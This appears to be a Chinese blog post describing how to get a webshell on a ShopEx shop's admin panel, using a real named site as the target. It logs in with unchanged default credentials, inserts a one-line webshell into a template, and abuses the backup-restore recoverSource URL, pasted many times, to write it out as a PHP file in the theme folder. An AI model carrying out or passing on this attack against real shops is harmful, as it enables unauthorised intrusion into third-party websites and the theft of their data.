shopex后台拿shell

shopex后台拿shell   网站主页就是酱紫的。

默认后台shopadmin,默认用户名admin和密码admin888,都没有修改,直接登录后台,通过百度shopex后台拿shell,看到乌云有个shopex的最新漏洞,立马运用起来。

但是这网站登录没后台几秒立马退出,

shopex后台拿shell

高端大气上档次

shopex后台拿shell

如图

shopex后台拿shell然后在里面插入一句话什么的,保存,(多保存几次,选择最后保存的那个历史文件)

shopex后台拿shell下面那个看见了没?看见了没?

info.bak_2.xml

info.bak_3.xml

info.bak_4.xml

鼠标放到后面的还原上面,复制其中的一个链接,

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

最后的EHS就是模板文件名

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://XXX.org.cn/themes/模板文件夹/info.php

 

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

http://worldart.org.cn/shopadmin/index.php?ctl=system/tmpimage&act=recoverSource&p[0]=info.bak_4.xml&p[1]=info.xml&p[2]=ehs

 

 

评论区

评论一下~


18+18=?

暂无评论,要不来一发?

回到顶部